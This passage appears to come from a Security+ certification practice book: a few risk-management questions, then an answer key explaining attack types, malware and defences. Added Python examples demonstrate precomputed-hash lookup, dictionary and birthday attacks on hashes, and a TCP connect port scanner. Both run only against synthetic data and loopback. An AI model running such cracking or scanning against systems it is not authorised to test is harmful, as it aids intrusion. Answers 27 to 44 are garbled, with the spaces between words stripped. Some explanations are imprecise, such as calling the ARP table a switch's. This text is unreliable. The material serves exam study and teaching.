D. Mitigation

122. The co-location facility that Joanna contracts to host her organization's servers is in a floodplain in a hurricane zone. What type of risk best describes the risk that Joanna and other customers face?

A. A multiparty risk

B. An internal risk

C. A legacy risk

D. An IP theft risk

123. The cloud service that Natasha's organization has used for the past five years will no longer be available. What phase of the vendor relationship should Natasha plan for with this service?

A. Preparing a service MOU

B. An EOL transition process

C. Creating an NDA

D. A last will and testament

124. Gary wants to use a secure configuration benchmark for his organization for Linux. Which of the following organizations would provide a useful, commonly adopted benchmark that he could use?

A. Microsoft

B. NIST

C. CIS

D. All of the above

125. After Angela left her last organization, she discovered that she still had access to her shared drives and could log into her email account. What critical process was likely forgotten when she left?

A. An exit interview

B. Job rotation

C. Offboarding

D. Governance

126. Frank knows that businesses can use any classification labels they want, but he also knows that there are a number of common labels in use. Which of the following is not a common data classification label for businesses?

A. Public

B. Sensitive

C. Private

D. Secret

127. Where are privacy notices frequently found?

A. The terms of an agreement for customers

B. A click-through license agreement

C. A website usage agreement

D. All of the above

Appendix: Answers and Explanations

Chapter 1: Threats, Attacks, and Vulnerabilities

1. C. The correct answer is spear phishing. Spear phishing is targeted to a specific group, in this case insurance professionals. Although this is a form of phishing, the more specific answer is the one you will need to choose on questions like this. Phishing uses social engineering techniques to succeed but is once again a broader answer than spear phishing and thus is not the correct choice. Finally, a Trojan horse pretends to be a legitimate or desirable program or file, which this scenario doesn't describe.

2. B. A logic bomb is malware that performs its malicious activity when some condition is met. A worm is malware that self-propagates. A Trojan horse is malware attached to a legitimate program, and a rootkit is malware that gets root or administrative privileges.

3. C. This is a very basic form of SQL injection. Cross-site scripting would have JavaScript in the text field and would be designed to impact other sites from a user's session. Cross-site request forgery would not involve any text being entered in the web page, and ARP poisoning is altering the ARP table in a switch; it is not related to website hacking.

4. B. This describes a jamming attack, where legitimate traffic is interfered with by another signal. Jamming can be intentional or unintentional and may be intermittent. IV attacks are obscure cryptographic attacks on stream ciphers. Wi-Fi Protected Setup (WPS) uses a PIN to connect to the wireless access point (WAP). The WPS attack attempts to intercept that PIN in transmission, connect to the WAP, and then steal the WPA2 password. A botnet is a group of machines that are being used, without their consent, as part of an attack.

5. B. The best option listed to defend against the attacks mentioned is input validation. Encrypting the web traffic will not have any effect on these two attacks. A web application firewall (WAF) might mitigate these attacks, but it would be secondary to input validation, and an intrusion detection system (IDS) will simply detect the attack; it won't stop it.

6. C. If users have been connecting but the AP does not show them connecting, then they have been connecting to a rogue access point. This could be the result of an architecture and design weakness such as a network without segmentation and control of devices connecting to the network. Session hijacking involves taking over an already authenticated session. Most session hijacking attacks involve impersonation: the attacker attempts to gain access to another user's session by posing as that user. Clickjacking involves causing visitors to a website to click on the wrong item. Finally, bluejacking is a Bluetooth attack.

7. C. Cross-site scripting involves entering a script into text areas that other users will view. SQL injection is not about entering scripts, but rather SQL commands. Clickjacking is about tricking users into clicking on the wrong thing. Bluejacking is a Bluetooth attack.

8. D. Retaining the actual password is not a best practice, and thus encrypting password plaintext is not a common technique to make passwords harder to crack. Since the application would need the cryptographic key to read the passwords, anybody who had access to that key could decrypt the passwords. Using a salt, a pepper, and a cryptographic hashing algorithm designed for passwords are all common best practices to prevent offline brute-force attacks.

9. A. Although this is one of the more dated items on the Security+ exam outline, you need to know that the term for Internet messaging spam messages is SPIM. The rest of the answers were made up, and though this shows up in the exam outline, the rest of the world has moved on from using this term.

10. B. A segmentation fault will typically stop the program from running. This type of issue is why a NULL pointer or other pointer de-referencing error is considered a potential security issue, as a denial-of-service condition impacts the availability of the service. This type of error is unlikely to cause a data breach or allow privilege escalation, and permissions creep occurs as individuals accrue more permissions over time in a single organization because their permissions are not cleaned up when they switch positions or roles.

11. C. The machines in her network are being used as bots, and the users are not aware that they are part of a distributed denial-of-service (DDoS) attack. Social engineering is when someone tries to manipulate you into giving information. Techniques involved in social engineering attacks include consensus, scarcity, and familiarity. There is a slight chance that all computers could have a backdoor, but that is very unlikely, and attackers normally don't manually log into each machine to do a DDoS; it would be automated, as through a bot.

12. C. There are many indicators of compromise (IoCs), including unusual outbound network traffic, geographical irregularities like logins from a country where the person normally does not work, or increases in database read volumes beyond normal traffic patterns. Predictive analysis is analysis work done using datasets to attempt to determine trends and likely attack vectors so that analysts can focus their efforts where they will be most needed and effective. OSINT is open source intelligence, and threat maps are often real-time or near real-time visualizations of where threats are coming from and where they are headed to.

Use the following scenario for questions 13–15.

Chris has recently deployed a security information and event management (SIEM) device and wants to use it effectively in his organization. He knows that SIEM systems have a broad range of capabilities and wants to use the features to solve problems that he knows his organization faces. In each of the following questions, identify the most appropriate SIEM capability or technique to accomplish what Chris needs to do for his organization.

13. B. When troubleshooting TCP handshakes, the most valuable tool in many cases is packet capture. If Chris sees a series of SYN packets without the handshake being completed, he can be reasonably sure the firewall is blocking traffic. Reviewing reports or logs may be useful for this as well but won't show the TCP handshake issue mentioned in the problem, and sentiment analysis is focused on how individuals and groups are responding, not on a technical problem.

14. D. User behavior analysis is a key capability when attempting to detect potential insider threats. Chris can use his SIEM's behavioral analysis capabilities to detect improper or illicit use of rights and privileges as well as abnormal behavior on the part of his users. Sentiment analysis helps analyze feelings, and log aggregation and security monitoring provide ways to gain insight into the overall security posture and status of the organization.

15. A. Using log aggregation to pull together logs from multiple sources, and performing collection and initial analysis on log collectors, can help centralize and handle large log volumes. Capturing packets is useful for network traffic analysis to identify issues or security concerns. Security monitoring is an overall function for security information and event management (SIEM) and doesn't specifically help with this need. Both sentiment analysis and user behavior analysis are aimed at users and groups rather than at how data is collected and managed.

16. B. White teams act as judges and observers during cybersecurity exercises. Blue teams act as defenders, red teams act as attackers, and purple teams are composed of both blue and red team members to combine attack and defense knowledge to improve organizational security.

17. A. The simplest way to ensure that APIs are only used by legitimate users is to require the use of authentication. API keys are one of the most frequently used methods for this. If an API key is lost or stolen, the key can be invalidated and reissued, and since API keys can be matched to usage, Cynthia's company can also bill customers based on their usage patterns if they want to. A firewall or IP restrictions may be able to help, but they can be fragile; customer IP addresses may change. An intrusion prevention system (IPS) can detect and prevent attacks, but legitimate usage would be hard to tell from those who are not customers using an IPS.

18. B. Buffer overflow attacks cram more data into a field or buffer than it can accept, overflowing into other memory locations and either crashing the system or application, or potentially allowing code to be inserted into executable locations. Bluesnarfing and bluejacking are both Bluetooth attacks. Cross-site scripting attacks allow attackers to inject scripts into pages viewed by other users.

19. A. Attackers are attempting to influence Gurvinder with a combination of scarcity and urgency. Thus, for this question you should answer scarcity since urgency is not listed. In many social engineering principle questions, more than one of the principles may be in play, and you will need to answer with the principle that is correct or more correct for the question. In this case, there is no intimidation or claim to authority, and consensus would require some form of validation from others.

20. A. Vulnerability scans use automated tools to look for known vulnerabilities in systems and applications and then provide reports to assist in remediation activities. Penetration tests seek to actually exploit the vulnerabilities and break into systems. Security audits usually focus on checking policies, incident reports, and other documents. Security test is a generic term for any sort of test.

21. C. Username complexity has no impact on credential harvesting. Multifactor authentication can help prevent successful credential harvesting by ensuring that even capture of username and password is not enough to compromise the account. Awareness training helps to reduce the likelihood of credential exposure, and limiting or preventing use of third-party web scripts makes websites less likely to have credentials stolen through the use of those scripts, plug-ins, or modules.

22. C. Greg can clone a legitimate Media Access Control (MAC) address if he can identify one on the network. This can be as easy as checking for a MAC label on some devices or by capturing traffic on the network if he can physically access it.

23. A. From the description it appears that they are not connecting to the real web server but rather a fake server. That indicates typosquatting: having a URL that is named very similarly to a real site so that when users mistype the real site's URL they will go to the fake site.

Options B, C, and D are all incorrect. These are all methods of attacking a website, but in this case, the actual website was not attacked. Instead, some users are visiting a fake site.

24. C. Domain hijacking, or domain theft, occurs when the registration or other information for the domain is changed without the original registrant's permission. This may occur because of a compromised account or due to a breach of the domain registrar's security. A common issue is a lapsed domain being purchased by a third party, and this can look like a hijacked domain, but it is a legitimate occurrence if the domain is not renewed! DNS hijacking inserts false information into a DNS server, on-path (man-in-the-middle) attacks capture or modify traffic by causing the traffic to pass through a compromised midpoint, and zero-day attacks are attacks that use a vulnerability that is unknown until it is used.

25. D. The term for low-skilled hackers is script kiddie. Script kiddies typically use prebuilt tools and do not have the expertise to make or modify their own tools. Nothing indicates this is being done for ideological reasons, and thus that a hacktivist is involved. Although "amateur" may be an appropriate description, the correct term is script kiddie. Finally, nothing in this scenario indicates an insider threat.

26. B. Phishing is intended to acquire data, most often credentials or other information that will be useful to the attacker. Spam is a broader term for unwanted email, although the term is often generally used to describe unwanted communications. Spear phishing targets specific individuals, whereas whaling targets important people in an organization. Smishing is sent via SMS (text message). Malware can be sent in any of these instances, but there is not a specific related term that means "spam with malware in it."

27. B. Acollectionofcomputersthatarecompromised,thencentrallycontrolledtoperformactionslikedenial-of-serviceattacks,datacollection,andothermaliciousactivitiesiscalledabotnet.Zombienets,Nullnets,andAttacknetsarenotcommonlyusedtermstodescribebotnets.

28. B. Systemsandsoftwarethatnolongerhavevendorsupportcanbeasignificantsecurityrisk,andensuringthatavendorwillcontinuetoexistandprovidesupportisanimportantpartofmanyprocurementprocesses.Selah’squestionsareintendedtoassessthelongevityandviabilityofthecompanyandwhetherbuyingfromthemwillresultinherorganizationhavingausableproductforthelongterm.

29. B. Passivereconnaissanceisanyreconnaissancethatisdonewithoutactuallyconnectingtothetarget.Inthiscase,JohnisconductingaformofOSINT,oropensourceintelligence,byusingcommonlyavailablethird-partyinformationsourcestogatherinformationabouthistarget.Activereconnaissanceinvolvescommunicatingwiththetargetnetwork,suchasdoingaportscan.Theinitialexploitationisnotinformationgathering;itisactuallybreakingintothetargetnetwork.Apivotiswhenyouhavebreachedonesystemandusethattomovetoanothersystem.

30. A. Server-siderequestforgery(SSRF)attemptstypicallyattempttogetHTTPdatapassedthroughandwillnotincludeSQLinjection.Blockingsensitivehostnames,IPaddresses,andURLsareallvalidwaystopreventSSRF,asistheuseofwhitelist-basedinputfilters.

31. A. DomainNameSystem(DNS)poisoningattacksattempttoinsertincorrectormaliciousentriesintoatrustedDNSserver.AddressResolutionProtocol(ARP)poisoninginvolvesalteringtheMAC-IPtablesinaswitch.Althoughcross-sitescripting(XSS)andcross-siterequestforgery(CSRForXSRF)arebothtypesofattacks,neitherisapoisoningattack.

32. C. Anunknownenvironmenttestisalsocalledblack-boxorazero-knowledgetestbecauseitdoesnotprovideinformationbeyondthebasicinformationneededtoidentifythetarget.Aknownenvironment,orwhite-boxtest,involvesverycompleteinformationbeinggiventothetester.Thisscenarioisprobablydonefromoutsidethenetwork,butexternaltestisnot

Telegram Channel @nettrain

thecorrectterminology.Threattestisnotatermusedinpenetrationtesting.

33. D. Apivotoccurswhenyouexploitonemachineandusethatasabasistoattackothersystems.Pivotingcanbedonefrominternalorexternaltests.White-andblack-boxtestingdescribestheamountofinformationthetesterisgiveninadvance,nothowthetesterperformsthetest.

34. A. Shimmingiswhentheattackerplacessomemalwarebetweenanapplicationandsomeotherfileandinterceptsthecommunicationtothatfile(usuallytoalibraryorsystemAPI).Inmanycases,thisisdonewithadriverforahardwarecomponent.ATrojanhorsemightbeusedtogettheshimontothesystem,butthatisnotdescribedinthisscenario.Abackdoorisameanstocircumventsystemauthorizationandgetdirectaccesstothesystem.Refactoringistheprocessofchangingnamesofvariables,functions,andsoforthinaprogram.

35. C. SOARisarelativelynewcategoryasdefinedbyGartner.Securityorchestration,automation,andresponseincludesthreatandvulnerabilitymanagement,securityincidentresponse,andsecurityoperationsautomation,butnotautomatedmalwareanalysis.

36. C. DomainreputationserviceslikeReputationAuthority,Cisco’sTalos,McAfee’strustedsource.org,andBarracuda’sbarracudacentral.orgsitesallprovidedomainreputationdatathatallowyoutolookupadomainorIPaddresstodetermineifitiscurrentlyblacklistedorhasapoorreputation.

37. B. Hismachinesarepartofadistributeddenial-of-service(DDoS)attack.ThisscenariodescribesagenericDDoS,notaspecificonelikeSYNflood,whichwouldinvolvemanySYNpacketsbeingsentwithoutafullthree-wayTCPhandshake.Thesemachinescouldbepartofabotnetortheymayjusthaveatriggerthatcausesthemtolaunchtheattackataspecifictime.TherealkeyinthisscenarioistheDDoSattack.Finally,abackdoorgivesanattackeraccesstothetargetsystem.

38. B. SinceopenWi-Fihotspotsdonothaveawaytoprovetheyarelegitimate,theycanbeeasilyspoofed.AttackerscanstandupafakeversionofthehotspotandthenconductanSSLstrippingattackbyinsertingthemselvesintosessionsthatvictimsattempttoopentosecureservers.

39. B. ATrojanhorseattachesamaliciousprogramtoalegitimateprogram.Whentheuserdownloadsandinstallsthelegitimateprogram,theygetthemalware.Alogicbombismalwarethatdoesitsmisdeedswhensome

Telegram Channel @nettrain

conditionismet.Arootkitismalwarethatgetsadministrative,orroot,access.Amacrovirusisavirusthatisembeddedinadocumentasamacro.

40. D. Whalingistargetingaspecificindividualwhoisimportantintheorganizationlikethepresidentorchieffinancialofficer(CFO).Spearphishingtargetsspecificindividualsorgroups,butwhalingismorespecificintermsoftheimportanceoftheindividualsinvolved.Targetedphishingisnotatermusedintheindustry.Phishingisthegenerictermforawiderangeofrelatedattacks,andyoushouldchoosethemostaccurateanswerforquestionslikethis.

41. D. Criminalsyndicatesmayproduce,sell,andsupportmalwaretools,ormaydeploythemthemselves.Cryptomalwareandotherpackagesareexamplesoftoolsoftencreatedandusedbycriminalsyndicates.Stateactorsaremorelikelytobeassociatedwithadvancedpersistentthreats(APTs)aimedataccomplishinggoalsofthenation-statethatsupportsthem.Hacktiviststypicallyhavepoliticalmotivations,whereasscriptkiddiesmaysimplybeinitforrecognitionorfun.

42. A. Arainbowtableisatableofprecomputedhashes,usedtoretrievepasswords.Abackdoorisusedtogainaccesstoasystem,nottorecoverpasswords.Socialengineeringanddictionaryattackscanbothbeusedtogainaccesstopasswords,buttheyarenottablesofprecomputedhashes.

43. B. Themostcommonconcernthatwillarisewhenavendornolongersupportsadeviceisalackofupdatesorpatches.Thisisparticularlyconcerningwhenthedevicesareoperationaltechnologysuchasutility,lighting,orotherinfrastructurecontroldevicesthathaveaverylonglifecycleandcontrolimportantprocessesorsystems.Althoughimproperdatastorage,lackofdocumentation,andconfigurationissuescanallbeissues,lackofupdatesandpatchingremainsthebiggestandmostfrequentissue.

44. A. BluejackinginvolvessendingunsolicitedmessagestoBluetoothdeviceswhentheyareinrange.BluesnarfinginvolvesgettingdatafromtheBluetoothdevice.Aneviltwinattackusesarogueaccesspointwhosenameissimilaroridenticaltothatofalegitimateaccesspoint.

45. A. Since Dennis is able to view the web traffic before it is sent to the actual server, he should be able to conduct a plain-text password attack by intercepting the password. Pass-the-hash attacks are typically used inside Windows environments, SQL injection would attack the server, and cross-site scripting is possible but not as likely as the plain-text password attack in this scenario.

46. A. Dumpster diving is the term for rummaging through the waste/trash to recover useful documents or materials. Penetration testers and attackers may dumpster-dive as part of their efforts. In fact, emptying trash cans in a location can provide useful information even without jumping into a dumpster! Trash diving and trash engineering are not the terms used in the industry. Nothing in this scenario describes social engineering.

47. A. This is a remote-access Trojan (RAT), malware that opens access for someone to remotely access the system. A worm would have spread itself via a vulnerability, whereas a logic bomb runs when some logical condition is met. Finally, a rootkit provides root or administrative access to the system.

48. B. Zero-day exploits are new, and they are not in the virus definitions for the antivirus (AV) programs. This makes them difficult to detect, except by their behavior. RATs, worms, and rootkits are more likely to be detected by AV programs.

49. D. Radio frequency identification (RFID) attacks typically focus on data capture, spoofing RFID data, or conducting a denial-of-service attack. Birthday attacks are used against cryptosystems, which may be part of an RFID tag environment, but they aren't a common attack against RFID systems.

50. C. Initialization vectors (IVs) are used with stream ciphers such as RC4, as well as with many block cipher modes. An IV attack attempts to exploit a flaw in how the IV is generated or reused in order to expose encrypted data; the classic example is WEP, whose short, reused IVs allowed recovery of the key. Nothing in this scenario requires or describes a rogue access point/evil twin. Wi-Fi Protected Setup (WPS) uses a PIN to connect to the wireless access point (WAP). The WPS attack brute-forces that PIN (the protocol reveals whether each half of the PIN is correct separately, which keeps the search small), connects to the WAP, and then recovers the WPA2 passphrase.

51. C. This description does not include any risk to availability since there is no information about systems or services being down or offline. This scenario would likely result in reputational, financial, and data loss impacts for Scott's company.

52. B. Cross-site request forgery (XSRF or CSRF) sends fake requests to a website that purport to be from a trusted, authenticated user. Cross-site scripting (XSS) exploits the trust the user has for the website and embeds scripts into that website. Bluejacking is a Bluetooth attack. Nothing in this scenario requires or describes an evil twin, which is an attack that uses a malicious access point that duplicates a legitimate AP.

53. A. Cyber intelligence fusion is the process of gathering, analyzing, and then distributing information between disparate agencies and organizations. Fusion centers like those operated by the U.S. Department of Homeland Security (DHS) focus on strengthening shared intelligence activities. They are not specifically tasked with building tools by combining other tools, although they may in some cases. They are not power plants, and they are focused on gathering and sharing information, not building a classification structure.

54. B. The Common Vulnerabilities and Exposures (CVE) list has entries that describe and provide references to publicly known cybersecurity vulnerabilities. A CVE feed will provide updated information about new vulnerabilities and a useful index number to cross-reference with other services.

55. B. A birthday attack exploits the birthday problem in probability theory: among randomly chosen values, a collision becomes likely after roughly the square root of the number of possible outputs, so far fewer attempts are needed than the size of the output space would suggest. Birthday attacks are one method of attacking cryptographic hash functions. They are not a social engineering attack, a network denial-of-service attack, or a TCP/IP protocol attack.

56. B. This is an example of a disassociation attack. The deauthentication packet causes Juanita's system to disassociate, and the attacker can then execute a second attack targeting her authentication credentials or other wireless data using an evil twin attack. Misconfiguration won't cause authenticated users to deauthenticate. Session hijacking involves taking over an authenticated session. Backdoors are built-in methods to circumvent authentication.

57. A. Dictionary attacks use a list of words that are believed to be likely passwords. A rainbow table is a precomputed table of hashes. Brute force tries every possible combination. If an attacker has the original plaintext and ciphertext for a message, they can brute-force the key by trying candidate keys until the known plaintext encrypts to the known ciphertext (a known-plaintext attack). Session hijacking is when the attacker takes over an authenticated session.

58. B. Downgrade attacks seek to make a Transport Layer Security (TLS) connection use a weaker protocol version or cipher suite, thus allowing the attacker to more easily break the encryption and read the protected data. In a disassociation attack, the attacker attempts to force the victim into disassociating from a resource. Session hijacking is when the attacker takes over an authenticated session. Brute force attempts every possible combination to get the password or encryption key.

59. D. A collision is when two different inputs produce the same hash. A rainbow table is a table of precomputed hashes. Brute force attempts every possible combination to get the password or encryption key. Session hijacking is when the attacker takes over an authenticated session.
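The password-hash attacks named in answers 42, 55, 57 and 59 (precomputed hash tables, dictionary attacks, and birthday collisions) are easier to reason about when you can see the work each one costs. The following Python is an added example written for this edit, not code from the book; the wordlist is constructed, and the "precomputed table" is a plain hash-to-plaintext dictionary rather than a full rainbow table with reduction chains, which trades storage for time but gives the attacker the same advantage: the hashing is done once, in advance. The birthday attack is shown against a digest truncated to a small number of bits so the collision is found in milliseconds.

```python
import hashlib
import secrets

# Constructed wordlist standing in for a password dictionary (synthetic, not leaked data).
WORDLIST = ["password", "letmein", "qwerty", "Summer2021", "dragon", "monkey"]


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def build_precomputed_table(words):
    """Precompute hash -> plaintext for every candidate once.

    A true rainbow table compresses this with hash/reduce chains, but the
    attacker's advantage is the same: the hashing work is done in advance and
    reused against every unsalted hash captured later."""
    return {sha256_hex(w): w for w in words}


def lookup_hash(table, target_hash):
    """O(1) recovery of a password from an unsalted hash, or None."""
    return table.get(target_hash)


def salted_hash(password: str, salt: bytes) -> str:
    return hashlib.sha256(salt + password.encode()).hexdigest()


def dictionary_attack(words, salt, target_hash):
    """A salt defeats the precomputed table, which was built without it; the
    attacker must rehash the whole dictionary per salt (and so per user)."""
    for w in words:
        if salted_hash(w, salt) == target_hash:
            return w
    return None


def truncated_digest(data: bytes, bits: int) -> int:
    """Top `bits` bits of SHA-256, modelling a hash with a small output space."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") >> (256 - bits)


def find_collision(bits: int, max_tries: int = 1_000_000):
    """Birthday attack: hash distinct inputs until two share a digest.

    Expected work is about 2 ** (bits / 2), not 2 ** bits, because each new
    digest is checked against all earlier ones at once via the dictionary.
    Returns (msg_a, msg_b, tries) or None if max_tries is exhausted."""
    seen = {}
    for i in range(max_tries):
        msg = b"msg-%d" % i          # inputs are all distinct by construction
        d = truncated_digest(msg, bits)
        if d in seen:
            return seen[d], msg, i + 1
        seen[d] = msg
    return None


if __name__ == "__main__":
    table = build_precomputed_table(WORDLIST)
    print("unsalted lookup:", lookup_hash(table, sha256_hex("qwerty")))
    salt = secrets.token_bytes(16)
    print("salted lookup against the table:", lookup_hash(table, salted_hash("qwerty", salt)))
    print("dictionary attack on salted hash:", dictionary_attack(WORDLIST, salt, salted_hash("qwerty", salt)))
    a, b, tries = find_collision(24)
    print(f"24-bit collision after {tries} hashes: {a!r} vs {b!r}")
```

For a 24-bit digest the collision typically appears after a few thousand hashes rather than the 16 million a brute-force preimage search would need; that square-root saving is exactly why hash output sizes are chosen at twice the intended security level. Note also that the salt only forces per-user rehashing; a slow, memory-hard password hash (bcrypt, scrypt, Argon2) is what makes each of those rehashes expensive.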

60. C. An advanced persistent threat (APT) involves sophisticated (i.e., advanced) attacks over a period of time (i.e., persistent). A distributed denial-of-service (DDoS) attack could be a part of an APT campaign, but in and of itself is unlikely to be an APT. Brute force attempts every possible combination to get the password or encryption key. In a disassociation attack, the attacker attempts to force the victim into disassociating from a resource.

61. B. Phishing is not commonly used to acquire email addresses. Phishing emails target personal information and sensitive information like passwords and credit card numbers in most cases.

62. A. When an IDS or antivirus mistakes legitimate traffic for an attack, this is called a false positive. A false negative is when the IDS mistakes an attack for legitimate traffic; it is the opposite of a false positive. Options C and D are both incorrect. Although these may be grammatically correct, these are not the terms used in the industry. In military operations, false flag operations attempt to transfer blame to another party, thus a "false flag."

63. B. A keylogger is a software or hardware tool used to capture keystrokes. Keyloggers are often used by attackers to capture credentials and other sensitive information. A rootkit is used to obtain and maintain administrative rights on a system, and a worm is a self-spreading form of malware that frequently targets vulnerable services on a network to spread.

64. A. The term for attempting to gain any privileges beyond what you have is privilege escalation. Session hijacking is taking over an authenticated session. Root grabbing and climbing are not terms used in the industry.

65. B. MAC flooding attacks attempt to overflow a switch's CAM table, causing the switch to send all traffic to all ports rather than to the port that a given MAC address is associated with. Although this was possible with many older switches, most modern switches are less susceptible to this type of attack, and some have security capabilities built in (such as port security limits on the number of MAC addresses learned per port) to prevent this type of attack.

66. B. Spyware and adware are both common examples of PUPs, or potentially unwanted programs. Though not directly malicious, they can pose risks to user privacy as well as create annoyances like pop-ups or other unwanted behaviors. Trojans appear to be legitimate programs or are paired with them, RATs provide remote access and are a subcategory of Trojans, and ransomware demands payment or other actions to avoid damage to files or reputation.

67. C. A race condition can occur when multiple threads in an application are using the same variable and the situation is not properly handled. Option A is incorrect: a buffer overflow is attempting to put more data in a buffer than it is designed to hold. Option B is incorrect: a logic bomb is malware that performs its misdeed when some logical condition is met. Option D is incorrect: as the name suggests, improper error handling is the lack of adequate or appropriate error handling mechanisms within software.

68. B. The malware in this example is a Trojan horse: it pretends to be something desirable, or at least innocuous, and installs malicious software in addition to or instead of the desired software. A rootkit gives root or administrative access, spyware is malware that records user activities, and a boot sector virus is a virus that infects the boot sector of the hard drive.

69. B. The Postgres server is set up using a weak password for the user postgres, the administrative login for the database. This is a form of unsecured administrative or root account. Interestingly, this is not a default setting, since a default Postgres installation sets no password at all for the postgres account and relies on local trust or peer authentication instead, an arguably worse setting than using postgres as the password, but not by much!

70. A. Annie has moved laterally. Lateral movement moves to systems at the same trust level. This can provide access to new data or different views of the network depending on how the systems and security are configured. Privilege escalation involves gaining additional privileges, often those of an administrative user. Vertical movement is sometimes referenced when gaining access to systems or accounts with a higher security or trust level. Privilege retention was made up for this question.

71. A. This is an example of a false positive. A false positive can cause a vulnerability to show that was not actually there. This sometimes happens when a patch or fix is installed but the application does not change in a way that shows the change, and it has been an issue with updates where the version number is the primary check for a vulnerability. When a vulnerability scanner sees a vulnerable version number but a patch has been installed that does not update it (common with fixes backported by a Linux distribution), a false positive report can occur. A false negative would report a patch or fix where there was actually a vulnerability. Automatic updates were not mentioned, nor was a specific Apache version.

72. C. A buffer overflow is possible when boundaries are not checked and the attacker tries to put in more data than the variable can hold. Cross-site scripting (XSS) and cross-site request forgery (CSRF) are both web application attacks. A logic bomb is malware that performs its misdeed when some condition is met.

73. C. Consensus, sometimes called social proof, is a social engineering principle that leverages the fact that people are often willing to trust groups of other people. Here, the attackers have planted false information that the software is trustworthy, thus allowing targets to "prove" to themselves that they can safely install the software. Scarcity uses a perception that something may not be available or is uncommon and thus desirable. Familiarity takes advantage of the trust that individuals put into people and organizations they are already familiar with. Trust-based attacks exploit a perception of trustworthiness.

74. B. A logic bomb performs malicious actions when a specific condition or conditions are met. A boot sector virus infects the boot sector of the hard drive. A buffer overflow occurs when the attacker attempts to put more data in a variable than it can hold. A sparse infector virus performs its malicious activity intermittently to make it harder to detect.

75. B. Elicitation, the process of drawing useful information out of a target through ordinary conversation, is a key tool in a penetration tester's social engineering arsenal. Pretexting involves the use of believable reasons for the target to go along with whatever the social engineering is attempting to do. Impersonation involves acting like someone you are not, whereas intimidation attempts to scare or threaten the target into doing what the social engineer wants them to.

76. B. All of these protocols are insecure: they send credentials and data in cleartext. FTP has been replaced by secure versions in some uses (SFTP/FTPS), whereas Telnet has been superseded by SSH in modern applications. RSH is outmoded and should be seen only on truly ancient systems. If you find a system or device exposing these protocols, you will need to dig in further to determine why they are exposed and how they can be protected if they must remain open for a legitimate reason.

77. B. The best way for Scott to determine where an organization's wireless networks can be accessed from is to use wardriving, warflying, and/or warwalking techniques to map out the wireless signal footprint of the organization. OSINT and active scans would be useful for gathering information about the organization and its systems, but not about its wireless networks' range and accessibility, and social engineering is more likely to be useful for gathering information or gaining access to facilities or systems.

78. A. A macro virus is a malicious script (macro) embedded into a file, typically a Microsoft Office file. They are typically written in Visual Basic for Applications (VBA). A boot sector virus infects the boot sector of the hard drive. A Trojan horse is malware that is tied to a legitimate program. In this scenario, the malware is actually embedded in an Office document. The two are similar, but not the same. A remote access Trojan (RAT) is a Trojan horse that gives the attacker remote access to the machine.

79. C. By giving the tester logins, you are allowing them to conduct a credentialed scan (i.e., a scan with an account or accounts that allow them access to check settings and configurations). Known environment and partially known environment tests describe the level of knowledge the tester is given of the network. A credentialed (privileged) scan cannot be an unknown environment test, but it could be either known or partially known. An intrusive scan is a term used for scans that attempt to exercise or use the vulnerabilities they find instead of attempting to avoid harm.

80. B. The Security+ exam expects practitioners to be able to analyze scripts and code to determine roughly what function they perform and to be able to identify multiple programming languages. Python relies on formatting like indenting to indicate blocks of code and does not use line-end indicators (such as semicolons) as you would find in some languages. This code is a basic Python port scanner that will scan every port from 1 to 9999, checking to see if it allows a connection.
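The scanner the question shows is not reproduced in this answer key, so the following is an added example written for this edit (not the book's code) of the same technique: a TCP connect scan, the kind of script you should be able to recognize on the exam. It assumes nothing beyond the standard library; the helper functions that open and release loopback ports exist only so the scanner has a known-open and known-closed target to demonstrate against without touching any remote host.

```python
import socket
from concurrent.futures import ThreadPoolExecutor


def port_is_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """TCP connect scan of a single port.

    A completed three-way handshake (connect_ex returns 0) means the port is
    open. Closed ports return ECONNREFUSED and filtered ones time out; both are
    reported as False rather than raising, so a sweep never aborts midway."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        return sock.connect_ex((host, port)) == 0


def scan_ports(host: str, ports, timeout: float = 0.5, workers: int = 64):
    """Probe every port in `ports` concurrently; return the open ones, sorted.

    Threads suit this job because each probe is blocked on network I/O, so a
    sweep of 1-9999 finishes in seconds rather than roughly timeout * 9999."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda p: port_is_open(host, p, timeout), ports)
    return sorted(p for p, is_open in zip(ports, results) if is_open)


def start_local_listener():
    """Bind a listening TCP socket on an ephemeral loopback port so the scanner
    has a known-open target; returns (socket, port). Demo/test helper only."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    return listener, listener.getsockname()[1]


def reserve_closed_port() -> int:
    """Return a loopback port number that was just released and so is closed."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as tmp:
        tmp.bind(("127.0.0.1", 0))
        return tmp.getsockname()[1]


if __name__ == "__main__":
    listener, open_port = start_local_listener()
    try:
        closed_port = reserve_closed_port()
        print("open ports found:", scan_ports("127.0.0.1", [open_port, closed_port]))
    finally:
        listener.close()
```

A connect scan completes the handshake, so it is logged by the target like any other connection; the telltale in the original script is the loop over a port range feeding each value into a connect call. Only scan hosts you are authorized to test.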

81. C. Botnets are often used to launch DDoS attacks, with the attack coming from all the computers in the botnet simultaneously. Phishing attacks attempt to get the user to give up information, click on a link, or open an attachment. Adware consists of unwanted pop-up ads. A Trojan horse attaches malware to a legitimate program.

82. B. Amanda has discovered an insider threat. Insider threats can be difficult to discover, as a malicious administrator or other privileged user will often have the ability to conceal their actions or may actually be the person tasked with hunting for threats like this! This is not a zero-day (no vulnerability was mentioned), there was no misconfiguration since this was an intentional action, and encryption is not mentioned or discussed.

83. B. Social media influence campaigns seek to achieve the goals of the attacker or owner of the campaign. They leverage social media using bots and groups of posters to support the ideas, concepts, or beliefs that align with the goals of the campaign. Impersonation is a type of social engineering attack where the attacker pretends to be someone else. A watering hole attack places malware or malicious code on a site or sites that are frequently visited by a targeted group. Asymmetric warfare is warfare between groups with significantly different power or capabilities.

84. C. Using default settings is a form of weak configuration. Many vulnerability scanners and attack tools have default credentials and settings built in to test with, and default settings are easily obtained for most devices with a quick search of the Internet. Configuring the accounts is not the issue; changing default passwords and settings is. Although training users is important, that's not the issue in this scenario. Patching systems is important, but that won't change default settings.

